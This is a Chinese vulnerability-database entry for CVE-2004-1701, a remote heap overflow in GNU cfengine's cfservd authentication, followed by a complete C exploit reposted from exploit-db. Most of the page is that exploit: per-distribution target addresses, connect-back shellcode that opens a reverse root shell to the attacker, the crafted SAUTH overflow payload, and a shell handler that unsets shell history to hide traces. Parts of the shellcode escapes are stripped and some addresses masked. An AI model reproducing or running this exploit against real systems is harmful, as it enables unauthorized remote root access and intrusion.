GNU CFEngine AuthenticationDialogue基于远程堆缓冲区溢出漏洞 GNU CFEngine AuthenticationDialogue远程基于堆缓冲区溢出漏洞

GNU CFEngine AuthenticationDialogue基于远程堆缓冲区溢出漏洞 GNU CFEngine AuthenticationDialogue远程基于堆缓冲区溢出漏洞

漏洞ID 1108114 漏洞类型 缓冲区溢出
发布时间 2004-08-09 更新时间 2005-10-20
图片[1]-GNU CFEngine AuthenticationDialogue基于远程堆缓冲区溢出漏洞 GNU CFEngine AuthenticationDialogue远程基于堆缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1701
图片[2]-GNU CFEngine AuthenticationDialogue基于远程堆缓冲区溢出漏洞 GNU CFEngine AuthenticationDialogue远程基于堆缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200408-124
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/24361
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-124
|漏洞详情
Cfengine2.0.0到2.1.7p1版本cfservd中的AuthenticationDialogue函数存在基于堆的缓冲区溢出漏洞。远程攻击者可以通过RSA认证期间的超长SAUTH命令执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/10899/info
 
GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function.
 
The issue exists due to a lack of sufficient boundary checks performed on challenge data that is received from a client.
 
Because the size of the buffer, the size of data copied in a memcpy() operation, and the data copied are all controlled by the attacker, a remote attacker may likely exploit this condition to corrupt in-line heap based memory management data.
 
cfservd employs an IP based access control method. This access control must be bypassed prior to exploitation. This may hinder exploitation attempts.
 
This vulnerability is reported to affect versions 2.0.0 to 2.1.7p1 of cfengine cfservd.

/*           _ ________            _____                        ______
 *
 * cfengine rsa heap remote exploit  part of PTjob project /   / "fuck mm"
 * by jsk:exworm(http://exworm.hostrocket.com)            /
 * bug found by core
 * yep ta mei dayong ..hehe..so pub it..
 * my home: www.ph4nt0m.org
 * GT: emm.oyxin.seal.ava.haggis.b_root.more..
 * No girl No money  No jop...
 * bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23
 * cfengine rsa heap remote exploit ....s
 * --------------------------------------------------(need money.to..fk..girl..)
 * [+] lisntener...
 * [+] Connected, sending code...
 * [+] Ret: 0x0819f03e
 * [+] Got: 0x0811a590
 * [+] ownedbyOseen!
 * -----------------------------------------------------------
 * Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 *(wheel)
 *
 *
 */

#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <getopt.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <errno.h>
#include <linux/sockios.h>

#define BUF 1024


struct {
        char *distro;
        char *type;
        unsigned long ret;
        unsigned long got;

} targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine ;) */
        { "Redhat 7.3 ", "cfengine 2.1.7p1  ",0x0819f03e , 0x0811a590 },
        { "redhat 9.0  ", "cfengine 2.1.7p1", **********, ********** },  ( hehe:use fast-bin tips)
        { "Redhat  7.2  ", "cfengine 2.17p1 ", 0x080d1c78, 0x0806d0e3 },
        { "Redhat 7.1     ", "cfengine 2.17p1", 0x080d11e0, 0x082bc090 },
        { "Crash          ", "(All platforms)  ", 0x42424242, 0x41414141 },
};
char linux_connect_back[] =  /* connect back 45295 */
 "x31xc0x31xdbx31xc9x51xb1"
        "x06x51xb1x01x51xb1x02x51"
        "x89xe1xb3x01xb0x66xcdx80"
        "x89xc2x31xc0x31xc9x51x51"
        "x68x41x42x43x44x66x68xb0"
        "xefxb1x02x66x51x89xe7xb3"
        "x10x53x57x52x89xe1xb3x03"
        "xb0x66xcdx80x31xc9x39xc1"
        "x74x06x31xc0xb0x01xcdx80"
        "x31xc0xb0x3fx89xd3xcdx80"
        "x31xc0xb0x3fx89xd3xb1x01"
        "xcdx80x31xc0xb0x3fx89xd3"
        "xb1x02xcdx80x31xc0x31xd2"
        "x50x68x6ex2fx73x68x68x2f"
        "x2fx62x69x89xe3x50x53x89"
        "xe1xb0x0bxcdx80x31xc0xb0"
        "x01xcdx80";
int sock;
void usage();
void shell();




void
usage(char *prog)
{

         fprintf(stderr,"Usage: %s -t [-pah]n",prog);
        fprintf(stderr,"-t version       Linux version.n");
        fprintf(stderr,"-h target       The host to attack.n");
         fprintf(stderr,"-a password     Default password is "sorry no password. ".n");
        fprintf(stderr,"-p port         Default port is 5803.nn");
}

int
openhost(char *host,int port)
{
        struct sockaddr_in addr;
        struct hostent *he;

        he=gethostbyname(host);

        if (he==NULL) return -1;
        sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
        if (sock==-1) return -1;

        memcpy(&addr.sin_addr, he->h_addr, he->h_length);

        addr.sin_family=AF_INET;
        addr.sin_port=htons(port);

        if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)
        sock=-1;
        return sock;
}


void
shell(int sock)
{
        fd_set  fd_read;
        char buff[1024], *cmd="unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'n";
        int n;

        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {
                FD_SET(sock, &fd_read);
                FD_SET(0,    &fd_read);

                if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;

                if (FD_ISSET(sock, &fd_read)) {
                        if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                                fprintf(stderr, "[+] EOFn");
                                exit(2);
                        }

                        if (write(1, buff, n) <0) break;
                }

                if (FD_ISSET(0, &fd_read)) {
                        if ((n = read(0, buff, sizeof(buff))) < 0){
                                fprintf(stderr,"[+] EOFn");
                                exit(2);
                        }

                        if (send(sock, buff, n, 0) < 0) break;
                }
        }

        fprintf(stderr,"[+] Connection lost.nn");
        exit(0);
}

unsigned char
*get_my_ip_addr(int sockfd, struct ifreq *ifr)
{
        struct sockaddr_in sin;
        char *b = (char *) malloc(4);

        if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {
                fprintf(stderr, "Unable to get the local IP Address, use -d.n");
                exit(1);
        }

        memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));
        memcpy(b, (char *) &sin.sin_addr.s_addr, 4);
        return b;
}





int
main (int argc,char *argv[])
{
        char buf1[512];
        char buf2[512];
        char host[256];
        char pass[256]="changeme";
        char data;



        int  type= 0;
        int c=0;
        int port=8001;
        char device[256] = "eth0";
        unsigned char *ptr;

        struct hostent *hp;
        struct sockaddr_in sin_listener;
        struct ifreq ifr;
        struct timeval timeout;

        fd_set fdread;

        int delay       = 12;
        int i           = 0;
        int mode        = 0;
        int local_port  = 0;
        int opt         = 0;
        int ret         = 0;
        int sin_len     = sizeof (struct sockaddr_in);
        int sock        = 0;
        int sock2       = 0;
        int sockd       = 0;
        int listener    = 0;
        int time_out    = 4;
        int tmp         = 0;

        srand(getpid());

        fprintf(stdout,"cfengine rsa heap remote exploit ....sn");
        fprintf(stdout,"--------------------------------------------------(need money.to..fk..girl..)n");

        while((c=getopt(argc,argv,"h:p:a:t:")) !=EOF)
        {
                switch(c)
                {
                        case 'p':
                                port=atoi(optarg);
                                if ((port <= 0) || (port > 65535)) {
                                        fprintf(stderr,"Invalid port.nn");
                                        exit(1);
                                }
                                break;
                        case 'a':
                                memset(pass,0x0,sizeof(pass));
                                strncpy(pass,optarg,sizeof(pass) - 1);
                                break;
                        case 't':
                                type = atoi(optarg);
                                if (type == 0 || type > sizeof(targets) / 28) {
                                        for(i = 0; i < sizeof(targets) / 28; i++)
                                        fprintf(stderr, "%02d. %s - %s      [0x%08x - 0x%08x]n",
                                                i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].got);
                                        return -1;
                                }
                                break;
                        case 'h':
                                memset(host,0x0,sizeof(host));
                                strncpy(host,optarg,sizeof(host) - 1);
                                break;

                        default:
                                usage(argv[0]);
                                exit(1);
                                break;
                }
        }

        timeout.tv_sec = time_out;
        timeout.tv_usec = 0;

        if (strlen(host) == 0) {
                usage(argv[0]);
                exit(1);
        }
        sock=openhost(host, 5308);

        if (sock==-1) {
                fprintf(stderr,"- Unable to connect.nn");
                exit(1);
        }

        strncpy(ifr.ifr_name, device, 15);

        if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {
                fprintf(stderr, "socket() error.n");
                return -1;
        }

        if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                fprintf(stderr, "socket() error.n");
                return -1;
        }

        ptr = get_my_ip_addr(sockd, &ifr);
       memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);

        sin_listener.sin_family = AF_INET;
        memset(&sin_listener.sin_zero, 0x00, 8);

        while(1) {
                local_port = local_port = 45295;
                sin_listener.sin_port = htons(local_port);
                if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;
        }



        listen(listener, 1);
        fprintf(stdout, "[+] lisntener...n");
        linux_connect_back[33] = (unsigned int) *(ptr + 0);
        linux_connect_back[34] = (unsigned int) *(ptr + 1);
        linux_connect_back[35] = (unsigned int) *(ptr + 2);
        linux_connect_back[36] = (unsigned int) *(ptr + 3);



        memset(buf2,  0x0, sizeof(buf2));
        memset(buf1, 0x90, sizeof(buf1));

        for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];

        buf1[0] = (0x41414141 & 0x000000ff);
        buf1[1] = (0x41414141 & 0x0000ff00) >> 8;
        buf1[2] = (0x41414141 & 0x00ff0000) >> 16;
        buf1[3] = (0x41414141 & 0xff000000) >> 24;

        buf1[4] = (0x58585858 & 0x000000ff);
        buf1[5] = (0x58585858 & 0x0000ff00) >> 8;
        buf1[6] = (0x58585858 & 0x00ff0000) >> 16;
        buf1[7] = (0x58585858 & 0xff000000) >> 24;

        buf1[8] = (0xfffffffc & 0x000000ff);
        buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;
        buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;
        buf1[11] = (0xfffffffc & 0xff000000) >> 24;

        buf1[12] = (0xffffffff & 0x000000ff);
        buf1[13] = (0xffffffff & 0x0000ff00) >> 8;
        buf1[14] = (0xffffffff & 0x00ff0000) >> 16;
        buf1[15] = (0xffffffff & 0xff000000) >> 24;

        buf1[16] = (targets[type - 1].got -12 & 0x000000ff);
        buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;
        buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;
        buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;

        buf1[20] = (targets[type - 1].ret & 0x000000ff);
        buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;
        buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;
        buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;


      for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)
      {
        buf1[i + 24] = 0x7f;
        buf1[i + 25] = 0xeb;
      }
      for(; i < 300 - sizeof(linux_connect_back) - 1; i++)
        buf1[i + 24] = 0x90;
      strcpy(buf1 + i + 24, linux_connect_back);
      buf1[i + 24+ sizeof(linux_connect_back) - 1] = 'n';
      buf1[i + 25 + sizeof(linux_connect_back) - 1] = '';



         sprintf(buf2,   "k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%srn", buf1);

        fprintf(stdout, "Connected, sending code...n");
        fprintf(stdout, "[+] Ret: 0x%08xn", targets[type - 1].ret);
        fprintf(stdout, "[+] Got: 0x%08xn", targets[type - 1].got);
 while(1) {
                write(sock, buf2, strlen(buf2));
                close(sock);
                sleep(2);
                FD_ZERO(&fdread);
                FD_SET(listener, &fdread);

                timeout.tv_sec = time_out;
                timeout.tv_usec = 0;

                while(1) {

                        ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);

                        if (ret < 0) {
                                close(sock);
                                close(listener);
                                fprintf(stderr, "select() error.n");
                                return -1;
                        }

                        if (ret == 0) {
                                fprintf(stderr, "[+] Failed, waiting %d seconds.n"
                                                "[+] Use ctrl-c to abort.n", delay);
                                sleep(delay);
                                break;
                        }

                        if(FD_ISSET(listener, &fdread)) {
                                sock2 = accept(listener, (struct sockaddr *)&sin_listener, &sin_len);
                                close(sock);
                                close(listener);

                                fprintf(stderr, "[+] ownedbyOseen!n"
                                                "-----------------------------------------------------------n");
                                shell(sock2);
                                close(sock2);
                                return 0;
                        }
                }

        }

        fprintf(stderr, "[+] Exploit failed.n");
        close(listener);
        close(sock);
        return 0;

}
|参考资料

来源:XF
名称:cfengine-cfservd-command-execution(16935)
链接:http://xforce.iss.net/xforce/xfdb/16935
来源:BID
名称:10899
链接:http://www.securityfocus.com/bid/10899
来源:www.coresecurity.com
链接:http://www.coresecurity.com/common/showdoc.php?idx=387&idxseccion;=10
来源:GENTOO
名称:GLSA-200408-08
链接:http://security.gentoo.org/glsa/glsa-200408-08.xml
来源:SECUNIA
名称:12251
链接:http://secunia.com/advisories/12251
来源:BUGTRAQ
名称:20050219cfenginersaheapremoteexploit:partofPTjobproject
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110886670528775&w;=2
来源:BUGTRAQ
名称:20040809CORE-2004-0714:CfengineRSAAuthenticationHeapCorruption
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109208394910086&w;=2

相关推荐: Snowblind Web服务器服务拒绝漏洞

Snowblind Web服务器服务拒绝漏洞 漏洞ID 1107329 漏洞类型 缓冲区溢出 发布时间 2003-05-16 更新时间 2003-06-16 CVE编号 CVE-2003-0315 CNNVD-ID CNNVD-200306-080 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享